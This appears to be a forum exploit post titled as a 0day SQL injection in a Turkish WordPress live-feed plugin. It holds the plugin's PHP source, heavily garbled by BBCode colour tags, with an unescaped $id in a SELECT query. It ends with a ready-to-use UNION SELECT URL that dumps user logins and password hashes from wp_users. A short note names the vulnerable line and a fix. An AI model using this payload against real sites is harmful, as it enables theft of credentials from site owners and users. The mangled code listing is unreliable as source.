

PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]

alixcan_life_f.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'Gönderdiğiniz Feedler





ID

Mesaj

Tarih



'
[/COLOR][COLOR="#007700"];

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

}

echo
[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

if([/
COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'
index.php?feedlist=alix_feed_list&'[/COLOR][COLOR="#007700"];

for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'
[/COLOR][COLOR="#007700"];

echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

echo[/
COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}







echo
[/COLOR][COLOR="#DD0000"]'Feed Gönder'[/COLOR][COLOR="#007700"];

}elseif(isset([/
COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#DD0000"]'dashboard_alix_live#dashboard_alix_live'[/COLOR][COLOR="#007700"]){

echo[/COLOR][COLOR="#DD0000"]'

Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.

Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.

Bu Yazıları



[alixcan_live_feed] - Tüm Yazıları Listeler


[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler



Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.

'
[/COLOR][COLOR="#007700"];

}
else{[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]$baslik[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'resim'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$resim[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$date

[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_alixlivefeed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$veri_dizisi[/COLOR][COLOR="#007700"]);

echo[/COLOR][COLOR="#DD0000"]'Yazı Eklendi'[/COLOR][COLOR="#007700"];

}[/COLOR][COLOR="#FF8000"]/*submittwit bitimi */[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

jQuery(document).ready(function() {

jQuery('#upload_image_button').click(function() {

formfield = jQuery('#upload_image').attr('name');

tb_show('', 'media-upload.php?type=image&TB_iframe=true');

return false;

});

window.send_to_editor = function(html) {

imgurl = jQuery('img',html).attr('src');

jQuery('#upload_image').val(imgurl);

tb_remove();

}

});





Başlık:En Fazla 255 Karakter







Resim:





Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir



[/COLOR]" />







Feedleri Listele

[COLOR="#0000BB"]Kapat'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Hakkında'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]wp_add_dashboard_widget[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Canlı Yayın & Live Feed'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$yazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_ali'[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_dashboard_setup'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_setup'[/COLOR][COLOR="#007700"]);

function[/COLOR][COLOR="#0000BB"]head_ekle[/COLOR][COLOR="#007700"](){

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]add_action[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wp_head'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'head_ekle'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]add_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'alixcan_live_feed'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'alixcan_live_feed_shortcode'[/COLOR][COLOR="#007700"]);

function[/COLOR][COLOR="#0000BB"]alixcan_live_feed_shortcode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]){

global[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]shortcode_atts[/COLOR][COLOR="#007700"]( array([/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) ,[/COLOR][COLOR="#0000BB"]$atts[/COLOR][COLOR="#007700"]) );

if(empty([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])){





[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(`id`) FROM `wp_alixlivefeed`"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ceil[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sayfa_sor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) /[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]= (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]])) ? (int)[/COLOR][COLOR="#0000BB"]abs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alix_sayfa'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) *[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed LIMIT[/COLOR][COLOR="#0000BB"]$basla[/COLOR][COLOR="#DD0000"],[/COLOR][COLOR="#0000BB"]$sayfa_basina[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){echo[/COLOR][COLOR="#DD0000"]'

'[/COLOR][COLOR="#007700"];

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])){

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'





'[/COLOR][COLOR="#007700"];

}echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}else{

echo[/COLOR][COLOR="#DD0000"]'Henüz İçerik Girilmemiş'[/COLOR][COLOR="#007700"];

}





if([/COLOR][COLOR="#0000BB"]$sayfalar[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]Sayfalar: '[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_option[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'home'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]'?p='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]get_the_ID[/COLOR][COLOR="#007700"]();

for([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"];

echo ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$sayfa[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];



}else{



[/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM wp_alixlivefeed WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlsor[/COLOR][COLOR="#007700"]);

echo[/COLOR][COLOR="#DD0000"]'

'[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo (!empty([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"])) ?[/COLOR][COLOR="#DD0000"]'[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" target="_blank" title="'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'">[/COLOR][COLOR="#0000BB"]resim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" />'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baslik[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'







'[/COLOR][COLOR="#007700"];



}[/COLOR][COLOR="#FF8000"]//else

[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#FF8000"]// func biter[/COLOR][/COLOR] 
exploit (the injection sink is the shortcode handler's `$sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'")`, where `$id` is interpolated into the query unescaped; an `(int)` cast, as already done for `alix_sayfa`, or `$wpdb->prepare()` would close it — how the request's `id` parameter reaches `$atts` is not visible in this excerpt):

Код:
http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
 